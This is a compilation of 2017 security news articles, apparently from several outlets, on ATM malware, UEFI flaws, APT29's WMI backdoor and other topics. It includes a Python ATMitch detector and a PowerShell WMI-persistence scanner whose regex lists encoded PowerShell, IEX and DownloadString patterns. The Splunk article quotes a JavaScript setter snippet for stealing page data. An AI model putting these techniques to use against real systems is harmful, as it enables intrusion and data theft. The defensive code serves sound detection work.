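    FsEvent(110, "delete", r"C:\ATM\command.txt"),
    FsEvent(200, "create", r"C:\Users\op\Desktop\command.txt"),
    FsEvent(300, "delete", r"C:\Users\op\Desktop\command.txt"),
]

if __name__ == "__main__":
    for f in detect_atmitch_cycles(SAMPLE_EVENTS):
        print(f"{f.directory}: {f.binaries} issued {f.commands} "
              f"(cash-out={f.cash_out}, lifetime={f.lifetime_s}s)")
```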

The !A.exe and IJ.exe executables, which might be the installer and uninstaller of the malware, couldn’t be retrieved. “tv.dll”, the researchers say, contained one Russian-language resource.

This attack, Kaspersky notes, was connected to a fileless attack detailed in February 2017, which targeted numerous organizations worldwide. The attack, Morphisec revealed last month, was tied to an attack framework used in a series of other incidents detailed by Cisco and FireEye as well.


Apple Updates iOS to Patch Wi-Fi Vulnerability

4.4.2017 securityweek iOS
Apple has released an emergency security update for its iOS operating system to address a serious vulnerability affecting the Wi-Fi component.

According to the tech giant, the flaw is a stack-based buffer overflow that allows an attacker who is within range to execute arbitrary code on the Wi-Fi chip.

The security hole, tracked as CVE-2017-6975, has been addressed with the release of iOS 10.3.1 through improved input validation, Apple said. The update is available for iPhone 5 and later, iPod touch 6th generation and later, and iPad 4th generation and later.

9to5 Mac reported that while iOS 10.3 dropped support for 32-bit devices, the latest update reintroduces support for these systems.

The vulnerability was identified and reported by Gal Beniamini of Google Project Zero, which typically discloses the details of flaws found by its researchers after 90 days.

In a security advisory submitted to the Full Disclosure mailing list, Apple advised users to install the update immediately if possible, and pointed out that the update is only available through iTunes and the Software Update utility on the iOS device; the update will not show up on the Apple Downloads website or in the computer's Software Update application.

iOS 10.3.1 was released just one week after Apple announced the general availability of iOS 10.3, which brings many new features and patches for nearly 90 vulnerabilities. Roughly 30 of these security holes were reported to Apple by Google Project Zero researchers.


It's Official: McAfee Breaks Away from Intel With New Logo

4.4.2017 securityweek IT
McAfee Spins Out from Intel as a New Independent Company With Refreshed Logo

McAfee, one of the best known and persistent brands in cybersecurity, has re-emerged from Intel as an independent company. It was acquired by Intel for $7.68 billion in 2010. In 2014, Intel announced the McAfee brand would be phased out and replaced by Intel Security, although retaining the red shield logo. In September 2016, Christopher Young, SVP and GM of the Intel Security Group, announced that McAfee would again be an independent company -- 49% owned by Intel and 51% owned by TPG. This transaction values the company at $4.2 billion.

The spin out is now complete, and McAfee is again an independent company. In this incarnation, the name is retained, but the original red shield logo is replaced by a stylized red shield and includes the epithet 'Together is power.' Chris Young is the CEO.

The McAfee brand has proved remarkably resilient over the years. It was one of the earliest security brands, and has survived the disdain of its original developer, the somewhat maverick John McAfee. But it has greater challenges ahead. To really succeed, Chris Young will need to transform an image associated with early, signature-based, legacy anti-virus into something more contemporary.

New McAfee Logo

The original anti-virus companies -- almost all now more than just AV -- were caught napping by the second-generation AV companies, who marketed themselves as machine-learning (ML) endpoint protection firms. The general perception is that machine-learning and artificial intelligence is the way forward, evidenced by another legacy firm, Sophos, buying ML firm Invincea. Young will need to transform public perception of an old brand into something more dynamic and forward thinking.

McAfee's plan is to achieve this by evolution rather than revolution. There are no major new security initiatives announced today, although a raft of new products were announced at the end of 2016. "We will continue to be very focused on our customers. The strategy outlined at our annual security conference, FOCUS 16, will be the same. We are focused on end-to-end solutions and pivoting to the cloud," says the company.

McAfee's vision is to accelerate its existing strategy to drive cybersecurity towards true automation, not just for itself but across the whole industry. Its belief is that it can better focus on this strategy as an independent company.

"Security is the fastest-growing, but also the most fragmented and least profitable of all parts of IT," corporate VP of global products at Intel Security, Brian Dye, told SecurityWeek. "That tells us we're doing something fundamentally wrong." He believes that automation is the solution to weak security, fragmentation, and profitability. "We want to drive a level of automation across the industry and bring that level of automation into our own portfolio -- being standalone lets us focus on that mission wholeheartedly."

He describes McAfee's path as an evolution from integration, "which is what we've done historically with ePolicy Orchestrator's single management pane of glass for the SOC;" to automation, "which is what we are doing with the Data Exchange Layer (DXL);" and ultimately on towards full orchestration, "which will bring together and automate more and more complex and sophisticated workflows."

Key to this evolution is the big data threat intelligence derived from the telemetry of millions of customers on endpoints and corporate servers across the globe driving automation, through machine learning and artificial intelligence, across the DXL fabric. The aim is to move towards full closed loop zero human touch automation wherever possible; and improved human/machine teaming elsewhere.

DXL allows the sharing of actionable threat intelligence not just across the McAfee portfolio, but also between the products of partners in the McAfee Security Innovation Alliance. Dye believes that increasing and improving machine learning will allow full automation across the whole SOC; and that DXL will provide the backbone of that automation.

But he sees this as not merely a vision but a necessity for the future. "The only way we will be able to adapt to the changes that are happening, from the cloud to edge computing and the IoT, is if we automate the security tasks across the industry," he told SecurityWeek. "We have to do that to free up the people and bandwidth to allow the implementation of these changes and new technologies. When new technologies arrive, you simply plug them into the DXL fabric. Change becomes an accelerator not an inhibitor; and it is our belief is that this is required for industry to be successful."

Through DXL and threat intelligence, he said, "we can drive the rebirth of one of cybersecurity's best known brands."


Honeywell SMX Protects Industrial Sites From USB Threats

4.4.2017 securityweek Cyber
Honeywell SMX

Honeywell announced on Tuesday the launch of a new product designed to protect industrial facilities from USB-borne threats by providing a simple way for organizations to track the removable media devices connected to their systems.

The new product, Secure Media Exchange (SMX), has two main components: an intelligence gateway and a piece of software installed on endpoints.

When a contractor wants to use a USB drive in a protected organization, they need to check the device at the intelligence gateway, a touchscreen system that can reside at the physical front desk or another location where it can be easily accessed by visitors.

Before entering the facility, users are prompted to complete a check-in procedure by connecting their USB drive to the gateway. The files stored on the drive are verified by Honeywell’s Advanced Threat Intelligence Exchange (ATIX) cloud service, which relies on both signatures and behavior analysis (i.e. running suspicious files in a special ICS sandbox) to identify known and zero-day threats.

According to Honeywell, the check-in process typically takes as long as a regular malware scan, depending on the size of the drive and the number of files. The ATIX service checks for known good and known bad files to expedite the process, and the scan can also be sped up by quarantining all files except for the ones that need to be used.

Once the process has been completed, the user can take the USB device and attach it to any endpoint within the organization. Devices that have not been checked by the gateway (e.g. a contractor wants to connect their smartphone for charging) will be blocked from using the endpoint's USB port.

The SMX client software running on endpoints will ensure that access to the files on a device is restricted if the check-in process has not been completed or if signs of tampering are detected.

In order to prevent malware from entering an organization, suspicious files are quarantined inside a password-protected archive file. Administrators can also block specific file types from getting into the facility.

When a contractor leaves the site, they will need to complete a check-out process at the SMX gateway. Failure to complete the process can result in the inability to access the files on the removable media device from a different computer. However, Honeywell says there are mechanisms in place to allow users to conduct the check-out process at a later time (e.g. a contractor could forget to complete the process when leaving an offshore platform via helicopter).

In addition to giving the user access to his/her files, the check-out process is designed to scan the device once again for malware in an effort to identify any threats that may already be inside the plant.

There have been several high-profile incidents where USB drives had been used to plant malware on an industrial network, including the notorious Stuxnet attacks and a 2013 incident that affected two US power plants.

Malware delivered via removable media is considered one of the biggest threats to industrial environments, but this type of storage is often required to perform updates. The risk is not easy to address, especially since, according to Honeywell, on average, an organization has seven different brands of control systems that require USB updates, and the number of daily contractors on site ranges between 25 and 150.


IAAF Says Russia-Linked Hackers Accessed Medical Records

4.4.2017 securityweek Hacking

The International Association of Athletics Federations (IAAF) revealed on Monday that athletes' medical records were accessed in an attack the organization believes was carried out by the Russia-linked cyber espionage group known as Fancy Bear.

Fancy Bear is also known as APT28, Pawn Storm, Strontium, Sofacy, Sednit and Tsar Team. The group is said to be responsible for many high-profile attacks, including the recent U.S. election hacks.

The IAAF, which is based in Monaco, said it learned of the breach after it hired incident response firm Context Information Security in January to conduct a technical investigation. Investigators found signs of unauthorized remote access on February 21, when they discovered metadata on athletes' Therapeutic Use Exemption (TUE) applications stored in a newly created file.

The breach impacts athletes who have applied for TUEs since 2012. Affected individuals have been contacted by the IAAF.

It's unclear if the attackers managed to exfiltrate the information they collected, but IAAF believes this provides a strong indication of what the attackers were after. The IAAF is confident the threat actor no longer has access to its networks following clean-up efforts assisted by Context, the UK National Cyber Security Centre (NCSC), and the Agence Monégasque de Sécurité Numérique (Monaco AMSN).

This is not the first time Fancy Bear has been accused of targeting an athletic organization. Last year, the World Anti-Doping Agency (WADA) said the hackers had stolen sensitive athlete data, including medical test results and TUEs.

Researchers linked the attack on WADA to the Fancy Bear cyberspies, but a group calling itself “Fancy Bears,” claiming to be affiliated with the Anonymous hacktivist movement, also took responsibility for the breach and leaked some of the stolen files.

In the WADA attack, hackers gained unauthorized access to the Anti-Doping Administration and Management System (ADAMS) after using a fake website to phish credentials. In the case of IAAF, there is no information on how the attackers may have gained access to the organization’s systems.


Joining the dots between the ancient Moonlight Maze espionage campaigns and the Turla APT
4.4.2017 securityaffairs Virus

Experts at Kaspersky presented the findings of their research, which definitively connect the Moonlight Maze cyber espionage campaigns to the Turla APT group.
One year ago, the researcher Thomas Rid at the Security Analyst Summit disclosed the alleged links between the Moonlight Maze cyber espionage operation of mid 1990s and the Turla APT.

Today at the annual Kaspersky Lab conference, Rid, along with security experts Costin Raiu and Juan Andres Guerrero-Saade, presented the findings of their research, which definitively connect the Moonlight Maze cyber espionage campaigns to the Russian APT group.


Moonlight Maze is the code name assigned to one of the first detected cyber espionage campaigns that targeted a number of critical U.S. government agencies, including the Pentagon, NASA and the Department of Energy.

Threat actors behind the Moonlight Maze were focused on UNIX systems such as Sun Solaris, while the Turla APT is more specialized in attacks on Windows systems.

The researchers speculated that the missing link between the two cyber espionage operations lies in the Penquin Turla attacks, dating back to 2011 and spotted by Kaspersky Lab in 2014. Penquin Turla was designed to compromise Linux machines with a backdoor based on the open-source LOKI2 backdoor that was released in Phrack magazine in September 1997.

“The revelation that the Moonlight Maze attacks were dependent on a Solaris/*NIX toolkit and not a Windows one as is the case with most of Turla, actually revived our hopes.” reads the analysis published by Kaspersky. “In 2014, Kaspersky announced the discovery of Penquin Turla, a Linux backdoor leveraged by Turla in specific attacks. We turned our attention once again to the rare Penquin samples and noticed something interesting: the code was compiled for the Linux Kernel versions 2.2.0 and 2.2.5, released in 1999. Moreover, the statically linked binaries libpcap and OpenSSL corresponded to versions released in the early 2000s. Finally, despite the original assessment incorrectly surmising that Penquin Turla was based on cd00r (an open-source backdoor by fx), it was actually based on LOKI2, another open-source backdoor for covert exfiltration written by Alhambra and daemon9 and released in Phrack in the late 1990s.”

Guerrero-Saade explained that of the 45 Moonlight Maze binaries that were detected by experts at Kaspersky, nine of them were examples of the LOKI2 backdoor.

This discovery is amazing because it demonstrates a 20-year-old hacking tool is still effective against high-value targets.

“This speaks to the state of Linux security and the lack of awareness—and even hubris—that goes into some Linux system administration, an ill-advised approach for government and corporate settings,” Guerrero-Saade said. “These guys (Moonlight Maze) didn’t have to play the cat-and-mouse game with antivirus companies or rewrite their toolkit 30 times to get it through VirusTotal and still hope it works. It’s terrifying to see that the evolved Penquin Turla samples are based on 20 year old code and still linked to libraries built in 1999-2004 and they still work on modern machines. You’d never see that on Windows.”

In summary, the possible link between Moonlight Maze's early UNIX and Solaris toolkits and modern Turla Windows attacks is the LOKI2 backdoor used in the Penquin Turla attacks.

The researchers conducted an intriguing and lucky investigation: they found the original artifacts thanks to a system administrator in the U.K. named David Hedges, who, in cooperation with the London Metropolitan Police and the FBI, logged every keystroke on a server targeted by Moonlight Maze. The researchers were able to find Hedges because of a redaction error in an FBI FOIA release.

Hedges confirmed that the server was still running and provided access to logs that include evidence of the Moonlight Maze operation, along with a toolkit of 43 binaries used in the attacks.

The investigation revealed further details: the researchers focused on a little-known operation codenamed 'Storm Cloud'. The toolkit used in those attacks was an evolution of the toolkit leveraged by the same Moonlight Maze threat actors.

The first attacks became public in 1999; Storm Cloud was made public four years later, and in this case too the code was based on the LOKI2 backdoor.

“We’re really trying to push the crowdsourcing element to this,” Guerrero-Saade said. “Thomas’ first talk helped us find David and more about Moonlight Maze. We need help. We need another David Hedges, someone with access to the Storm Cloud artifacts to really solidify this link.”


UEFI Vulnerabilities allow to fully compromise Gigabyte Mini PCs
4.4.2017 securityaffairs Vulnerebility

Experts at Cylance disclosed two UEFI flaws that can be exploited by attackers to install a backdoor on some Gigabyte BRIX mini PCs.
Experts at security firm Cylance have disclosed two UEFI vulnerabilities that can be exploited by attackers to install a backdoor on some Gigabyte BRIX mini PCs.

The experts tested the latest firmware for the GB-BSi7H-6500 and GB-BXi7-5775 mini PCs and discovered that it lacks some protection features, which could allow an attacker to exploit the flaws to deliver a ransomware payload that prevents the system from booting.

“These new mitigations, based on virtualization technologies in Windows 10, are vulnerable to UEFI-based attacks from System Management Mode (SMM). Because SMM allows direct access to physical memory, it’s possible to bypass the virtualization layer of isolation (Intel VT-x) . This kind of attack is already discussed in detail in ‘Attacking Hypervisors via Firmware and Hardware’. ” reads the analysis published by Cylance.

One of the issues, tracked as CVE-2017-3197, is related to the SMI handler and could be exploited to execute code in System Management Mode (SMM). The researchers discovered that the American Megatrends (AMI) firmware running on the affected devices has its write-protection mechanisms disabled. These security features are normally enabled, but Gigabyte seems to have disabled them.

The flaw is very dangerous: an attacker can trigger it by tricking victims into visiting a specially crafted website or opening a weaponized document. Once the flaw is triggered, the attacker can elevate privileges to achieve kernel-mode code execution, then exploit the SMI vulnerability to execute code in SMM and make direct changes to the flash memory.

Below is the attack chain described by the experts:

1. User-mode execution (ring 3)
2. Kernel mode execution (ring 0)
3. SMM execution (ring -2)
4. SPI Flash Write

“The attacker gains user-mode execution through an application vulnerability such as a browser exploit or a malicious Word document with an embedded script. From there, the attacker elevates his privileges by exploiting the kernel or a kernel module such as Capcom.sys to execute code in ring 0. A vulnerable SMI handler allows the attacker to execute code in SMM mode (ring -2) where he finally can bypass any write protection mechanisms and install a backdoor into the system’s firmware.”


The second vulnerability, tracked as CVE-2017-3198, is caused by the fact that the Gigabyte UEFI does not perform a cryptographic check to ensure the authenticity and integrity of a firmware update. This means that an attacker who exploits the issue is able to load malicious firmware onto the device.

“The GIGABYTE UEFI firmware does not cryptographically validate images prior to updating the system firmware. Additionally, the firmware updates are served over HTTP without checksums for verifying authenticity.” reads a blog post published by Cylance.

“An attacker can use the provided AMI Firmware Update (AFU) utility to write arbitrary code to the firmware.”

“As mentioned in our previous post, successful infection at such a low level has the potential to be disastrous. UEFI rootkits and ransomware, as we demonstrated at both RSA Conference and BlackHat Asia, could provide attackers with a degree of control that is difficult, if not near-impossible, to detect or rectify.” continues a blog post published by Cylance.

The security flaws were discovered just before Christmas and the experts reported them to Gigabyte in mid-January. The company has already developed a firmware update, version vF7, that is currently in the testing phase and will be released soon.

Unfortunately, the update will only be available for GB-BSi-7H-6500 because the GB-BXi7-5775 model has reached end of life.


Google's recent hacking challenge drew no interest

3.4.2017 SecurityWorld Security
Is Android remotely unbreakable, or was a two-hundred-thousand-dollar reward simply not enough motivation? Google is closing an unusual hacking challenge. Six months ago it offered USD 200,000 (roughly 5 million Czech crowns) to anyone who could remotely break into an Android device knowing only the user's phone number and e-mail address. Nobody claimed the reward.
However, although this may seem like good news testifying to the strength of the operating system's security, the reason the challenge found no winner is probably different. For example, potential participants objected that a USD 200,000 reward was too low for the task. If someone managed to break the system this way, they could sell their success for a far higher sum, something Google itself admitted after the contest ended.

Another reason for the low interest may, according to the company, be the difficulty of the task and the existence of similar challenges that are somewhat easier, or rather do not have such strict rules. Reaching the Android kernel and fully taking over a device requires discovering not one but many more bugs in the system and the ability to chain them together. One of the bugs would have to allow the attacker to remotely execute malicious code, for example within one of the applications, and additionally escape the application sandbox.

A condition of the challenge was also that the attacker had to take over the device without any interaction by its owner, i.e. without the user having to click a malicious link, visit a web page or open an e-mail attachment. This condition significantly limited the number of "entry points" through which attackers could get into the device. The first hole in the chain would have to be in the built-in SMS or MMS functions, or in the so-called baseband firmware that controls the modem and is exploitable over the mobile network.

A way of breaking Android security that met these criteria was discovered in 2015. Developers at Zimperium pointed out a set of bugs in the Stagefright multimedia library. They found that delivering a malicious MMS was practically enough to take over the system. Two years ago the case started a massive patching effort for Android, which included disabling the automatic MMS retrieval feature.

"Similar bugs exploitable remotely without user participation are rare and require a lot of creativity and ingenuity," Zuk Avraham, head of Zimperium, commented on Google's challenge. "And they are definitely worth more than two hundred thousand dollars."

Incidentally, Zerodium announced a similar contest, also offering USD 200,000 for remotely breaking Android, with the difference that it does not restrict user interaction. Zerodium resells the discovered bugs to its clients, which include intelligence agencies, among others.

The question therefore arises why, if someone really managed to discover such a bug, they would sell it to Google when even less complex hacks can be monetized on the black market just as well or better.

"In general, we can say that this contest was an experience for us and that we will use what we learned from it in further similar programs," said Natalie Silvanovich on behalf of Google, adding that she expects at least comments and feedback from honest developers.

Despite the contest's failure, it is worth mentioning that Google is a pioneer in such projects, and many others have borne fruit in the form of software improvements or the development of online services. And the probability that commercial vendors can compete in such situations with the rewards offered by criminal organizations or intelligence agencies is very low. Ultimately, bug-hunting programs and hacking contests are intended first and foremost for developers who do not lack a sense of responsibility.


Up to 90% of smart TVs can be hacked. Over DVB-T!
3.4.2017 Živě.cz BigBrothers

A security expert has developed a new concept for a sophisticated attack targeting so-called smart TVs. All it takes is a fake DVB-T transmitter, and a potential attacker can gain administrator privileges or the ability to run arbitrary malicious code. Ars Technica drew attention to the threat.

Most smart TVs are at risk

Rafael Scheel presented his findings at the EBU (European Broadcasting Union) security conference. His method of attack differs significantly from similar attempts to take control of smart TVs. It can be carried out from a remote location, without any interaction with the user, and in the background.
In practice, the technique is inconspicuous and almost undetectable. The worst part of the whole situation is that, according to the security expert, up to 90 percent of TVs sold in recent years are vulnerable. However, the list of tested or affected models was not published.

The main prerequisite for a successful attack is a smart TV connected to the internet and supporting the HbbTV standard. It does not matter how the signal itself is received; HbbTV technology can be successfully abused via the DVB-T and DVB-C standards as well as over IPTV.
For the demonstration, the researcher used a miniature DVB-T transmitter that he built from commonly available electronic components. The attack device cost him no more than USD 150 (roughly CZK 3,800).

Attacks can be carried out on a massive scale

A fake terrestrial transmitter can reach up to hundreds of households. In addition, some cable TV providers use DVB-T broadcasts for retransmission, which significantly increases the potential reach. In an extreme case, a drone carrying a DVB-T transmitter could also serve the purpose.

The question is how to get the TV, or rather the victim, to tune in to a broadcast containing malicious HbbTV content. The answer is one of the basic properties of modern TVs: they always prefer the stronger source of digital terrestrial broadcasting. The viewer thus cannot tell whether the device is connected to a legitimate transmitter or not.

The final phase is the attack itself. HbbTV is part of the DVB-T signal, which the TV processes immediately after a channel is selected. The most common command used in HbbTV is the initialization and loading of a target web page in the background.

It is precisely this feature that allows an inconspicuous way into the TV of an unsuspecting user. Rafael Scheel created special web pages that included malicious code, which exploited two older vulnerabilities in the core of the web browser integrated into smart TVs.

The result was administrator access and full control over the infected TV. Cybercriminals could then install any additional malware on the device, spy on the target using the built-in camera or microphone, steal stored credentials, carry out DDoS attacks against websites, and much more.

Undetectable and permanent

This type of attack is practically impossible to trace. About one minute of rogue broadcasting is enough for the device to become infected automatically. No traces or clues remain to show that the infiltration took place via DVB-T broadcasting.

Security flaws are a separate chapter. In this particular case, vulnerabilities more than two years old were exploited. The problem is that TV manufacturers are not obliged to patch their firmware regularly, and it stays full of holes for years.

Moreover, the malicious code can be written so as to block all attempts to check for and install updates. The security expert concluded by saying that his proof-of-concept malware remained present on the TV even after a factory reset.


Another batch of CIA leaks. WikiLeaks describes how the Americans allegedly pose as Russians, Chinese and others
3.4.2017 Živě.cz BigBrother

WikiLeaks has stepped things up and at the end of March released another batch of leaked documents from the CIA intelligence agency. This time, however, it is not vague documentation of various government cyber-espionage tools but finally something concrete: parts of the source code of the Marble Framework.
In this case it is not a cyber weapon but rather a stealth technology meant to cover tracks. Say cyber operatives need to get some malware onto a target's computer to open a door into the system. If they used their own solution, the other side could sniff out through forensic analysis who is behind it all.

One of the Marble framework's techniques, which inserts text strings, for example in Russian, into government malware. Marble is evidently superficial here, though: as the words "lorem ipsum" suggest, the sentences probably make little sense.

That is what the Marble Framework is for: it turns American malware into, say, Russian malware. How? The CIA can go about it in various ways. Either it simply modifies some Russian malware that originally served a completely different purpose, or it brings in Marble, which modifies their custom-made malware so that analysts at antivirus companies, for instance, will think it is a virus from somewhere in Eastern Europe.

Marble Framework does this, for example, by inserting various text strings in the required language into the virus's data. It can be Chinese script, Cyrillic, Arabic... Whatever the current need is.

As a result, the malware can look just like any of the thousands of others flying around the network trying to recruit the target computer into a botnet. That it was in fact the CIA that released it into the world, and that it has no interest in a classic botnet at all, ideally no one will ever find out, because Marble sweeps away all the traces.


New "USB Canary" Keeps Close Watch on USB Ports

3.4.2017 securityweek IT
New "USB Canary" Tool for Linux Monitors USB Ports 24/7

A new open source tool can provide Linux users with the ability to receive an alert any time someone attempts to plug a device into one of their machine’s USB ports.

Dubbed USB Canary, the tool uses pyudev to monitor USB devices and can be set to do so either at all times or only when the computer is locked. More importantly, the tool can be configured to alert users when someone is tampering with their USB ports. It can either send an SMS via the Twilio API, or send a Slack notification via an inbuilt Slack bot.

Released in open source not long ago, the tool aims at overcoming some of the shortcomings of other monitoring tools that inform the user on USB port-related incidents only after login. USB Canary aims at keeping an eye on systems at all times when they are unattended.

According to the researcher, who goes by the online handle errbufferoverfl, although the tool is available only for Linux at the moment, Windows and macOS versions are also planned (but no specific details on them have been revealed so far).

The tool is written in Python. The author explains that it was initially created as a personal utility while he was between jobs and that the use of third-party libraries.

Users can configure the tool to detect the type of screensaver running on the computer (it can detect XScreenSaver and gnome-screensaver, but can be used with unsupported screensavers as well), to turn a “paranoid” mode on, and set the notifications to arrive either via Twilio or Slack.

“Paranoid mode is also suitable for people who want to monitor if their servers have had USB's plugged into them, although I haven't tested them on Linode, Amazon Web Services, or Digital Ocean it is suitable for those with physical servers that may need this sort of monitoring,” the researcher notes.

Although this was a personal project in the beginning, others have already picked it up and helped improve it through their contributions.

The open source tool is available via GitHub.


APT29 Uses Stealthy Backdoor to Maintain Access to Targets

3.4.2017 securityweek APT
Researchers at FireEye-owned Mandiant have conducted a detailed analysis of a stealthy backdoor used by the Russia-linked cyberespionage group APT29 to maintain access to targeted systems.

Dubbed “POSHSPY,” the malware is believed to be a secondary backdoor used by the cyberspies in case they lose access to their primary backdoors. Mandiant first spotted POSHSPY in 2015 during an incident response engagement, and identified it on the networks of several organizations over the past two years.

Similar to other pieces of malware used by APT29, POSHSPY leverages PowerShell and the Windows Management Instrumentation (WMI) administrative framework.

WMI can be used to obtain system information, start and stop processes, and configure conditional triggers. In the case of POSHSPY, WMI is used to run a PowerShell command that decrypts and executes the backdoor code directly from a WMI property, thus ensuring that no artifacts are left on the hard drive.

The WMI component of POSHSPY executes the PowerShell component every Monday, Tuesday, Thursday, Friday and Saturday at 11:33 AM local time.

Experts pointed out that the use of legitimate Windows tools and the other techniques employed in these attacks increase the backdoor’s chances of evading detection.

“POSHSPY's use of WMI to both store and persist the backdoor code makes it nearly invisible to anyone not familiar with the intricacies of WMI. Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory,” explained Matthew Dunwoody, incident response consultant at Mandiant.

“The backdoor's infrequent beaconing, traffic obfuscation, extensive encryption and use of geographically local, legitimate websites for command and control (C2) make identification of its network traffic difficult. Every aspect of POSHSPY is efficient and covert,” Dunwoody added.
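As an added example (not Mandiant's or FireEye's code), the kind of check a defender would run for this persistence mechanism: it enumerates the permanent WMI event subscriptions in root\subscription and flags bindings whose consumer launches PowerShell or whose filter is time-based, which is the filter/consumer combination POSHSPY relies on. The regex patterns and the "Suspicious" heuristics are assumptions made for this example and should be tuned to your own environment.

```powershell
# Added example, not Mandiant's or FireEye's code: enumerate permanent WMI event
# subscriptions and flag the combinations POSHSPY-style persistence relies on
# (a time-based filter bound to a consumer that launches PowerShell).
# Requires an elevated Windows PowerShell / PowerShell session.

$Namespace = 'root\subscription'

# Patterns that warrant a closer look. Constructed for this example; tune to your estate.
$SuspiciousCommand = 'powershell|pwsh|-enc|EncodedCommand|FromBase64String|IEX|Invoke-Expression|DownloadString'
$TimeTriggerQuery  = 'Win32_LocalTime|Win32_UtcTime|__TimerEvent'

function Get-WmiSubscriptionReport {
    param([string]$Ns = $Namespace)

    # A permanent subscription is a filter (the trigger), a consumer (the action)
    # and a binding that ties the two together. __EventConsumer is the abstract base,
    # so querying it returns every concrete consumer (CommandLine, ActiveScript, ...).
    $filters   = @(Get-CimInstance -Namespace $Ns -ClassName __EventFilter)
    $consumers = @(Get-CimInstance -Namespace $Ns -ClassName __EventConsumer)
    $bindings  = @(Get-CimInstance -Namespace $Ns -ClassName __FilterToConsumerBinding)

    foreach ($b in $bindings) {
        # Reference properties come back as partial CimInstances carrying the key (Name).
        $f = $filters   | Where-Object Name -eq $b.Filter.Name   | Select-Object -First 1
        $c = $consumers | Where-Object Name -eq $b.Consumer.Name | Select-Object -First 1

        $type   = if ($c) { $c.CimClass.CimClassName } else { '<missing consumer>' }
        $action = ''
        # The "action" text lives in a class-specific property.
        if ($type -eq 'CommandLineEventConsumer')      { $action = [string]$c.CommandLineTemplate }
        elseif ($type -eq 'ActiveScriptEventConsumer') { $action = [string]$c.ScriptText }

        $reasons = @()
        if ($action -match $SuspiciousCommand)        { $reasons += 'consumer launches PowerShell / encoded content' }
        if ($f -and $f.Query -match $TimeTriggerQuery) { $reasons += 'time-based trigger (scheduled execution)' }
        if ($type -eq 'ActiveScriptEventConsumer')     { $reasons += 'script consumer' }

        [pscustomobject]@{
            Filter       = if ($f) { $f.Name } else { '<missing filter>' }
            Query        = if ($f) { $f.Query } else { '' }
            Consumer     = if ($c) { $c.Name } else { $b.Consumer.Name }
            ConsumerType = $type
            Action       = $action
            Suspicious   = ($reasons.Count -gt 0)
            Reasons      = ($reasons -join '; ')
        }
    }
}

$report = Get-WmiSubscriptionReport
$report | Format-List

# Items worth triage. The consumer text is often only a short loader: POSHSPY keeps
# its payload in a separate WMI property, so also review any non-standard classes
# and properties present in the namespace, not just the bindings listed here.
$report | Where-Object Suspicious | Format-Table Filter, ConsumerType, Reasons -AutoSize

# Going forward, enable the WMI-Activity operational log so that new permanent
# subscriptions are recorded (event ID 5861 on Windows 10 / Server 2016 and later).
wevtutil sl Microsoft-Windows-WMI-Activity/Operational /e:true
```

Run the script on a known-clean baseline first; some management agents register legitimate subscriptions that will match the time-based pattern.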

The malware allows attackers to download and execute additional PowerShell code and executable files. The threat communicates with command and control (C&C) servers located at URLs generated using a domain generation algorithm (DGA) that relies on lists of domain names, TLDs, subdomains, URIs, file names and file extensions. C&C communications are encrypted using AES and RSA public key cryptography.

FireEye has not shared any information on which countries or what types of organizations have been targeted in attacks involving the POSHSPY backdoor.

The APT29 group has put some effort into making its operations more difficult to detect. Earlier this month, FireEye detailed the threat actor’s use of a technique called “domain fronting” to disguise the malicious traffic generated by its tools.

APT29 is also known as The Dukes, Cozy Bear and Cozy Duke. The group is believed to be behind the recent election-related attacks in the U.S. and a campaign targeting high-profile organizations in Norway.


UEFI Vulnerabilities Found in Gigabyte Mini PCs

3.4.2017 securityweek Vulnerability

Endpoint security firm Cylance has disclosed the details of two potentially serious UEFI vulnerabilities that can be exploited to install a backdoor on some Gigabyte BRIX mini PCs. The vendor is working on a firmware update that will address the flaws.

Cylance said it had tested the latest firmware for GB-BSi7H-6500 and GB-BXi7-5775 mini PCs and discovered that some important protection mechanisms are missing. The company has described an attack scenario where a malicious actor exploits the vulnerabilities to deliver a ransomware payload that prevents the system from booting.

One of the vulnerabilities found by researchers, tracked as CVE-2017-3197, is related to the SMI handler and it allows an attacker to execute code in System Management Mode (SMM). The American Megatrends (AMI) firmware present on affected devices does normally provide write-protection mechanisms designed to prevent unauthorized changes, but these protections have not been enabled by Gigabyte.

Hackers can exploit this flaw for malicious attacks by first gaining access to the targeted system via a browser or document exploit. The attacker can then elevate privileges to achieve kernel mode code execution. Since write-protection mechanisms are not enabled, the attacker can exploit the SMI vulnerability to execute code in SMM and make changes to the flash memory.

The second vulnerability, identified as CVE-2017-3198, is related to the fact that the Gigabyte UEFI does not perform a cryptographic check to ensure that a firmware update is legitimate. Furthermore, firmware updates are served over HTTP.

An attacker who obtains access to the targeted system can install the legitimate UEFI update utility and use it to push a malicious firmware onto the device.

“Successful infection at such a low level has the potential to be disastrous,” Cylance researchers said in a blog post. “UEFI rootkits and ransomware could provide attackers with a degree of control that is difficult, if not near-impossible, to detect or rectify.”

The vulnerabilities were discovered on December 20 and they were reported to Gigabyte in mid-January. The vendor says it has prepared a firmware update, version vF7, that is in the final phase of testing. However, the update will only be available for the GB-BSi7H-6500, as the GB-BXi7-5775 model has reached end of life.


Splunk Patches Information Theft and XSS Flaws

3.4.2017 securityweek Vulnerability
Splunk last week released an update for Splunk Enterprise to address an information theft bug and a persistent Cross Site Scripting (XSS) vulnerability.

Discovered last year by security researcher John Page (who goes by the online handle of hyp3rlinx), the information theft issue is tracked as CVE-2017-5607 and has been assessed a CVSS Base Score of 3.5. The vulnerability can be exploited by a remote attacker to siphon information from Splunk Enterprise when the user visits a malicious webpage.

In an advisory, the security researcher notes that an attacker exploiting this vulnerability could access data such as the currently logged-in username and whether the remote user setting is enabled. With the username in hand, the attacker could either phish or brute force the Splunk Enterprise login.

The attacker can use JavaScript to exploit the issue, as the root cause is that the configuration served by config?autoload=1 assigns the '$C' JS variable in the global Window namespace, the security researcher notes in his advisory.

“To steal information we simply can define a function to be called when the '$C' JS property is ‘set’ on webpage, for example.

Object.defineProperty( Object.prototype, "$C", { set:function(val){...

The Object prototype is an Object that every other object inherits from in JavaScript. If we create a setter on the name of our target, in this case "$C", we can get/steal the value of this data; in this case it is very easy as it is assigned to the global Window namespace,” the researcher explains.

Splunk has confirmed that affected Splunk Enterprise versions include 6.5.x before 6.5.3; 6.4.x before 6.4.6; 6.3.x before 6.3.10; 6.2.x before 6.2.13.1; 6.1.x before 6.1.13; 6.0.x before 6.0.14; 5.0.x before 5.0.18; and Splunk Light before 6.5.2.

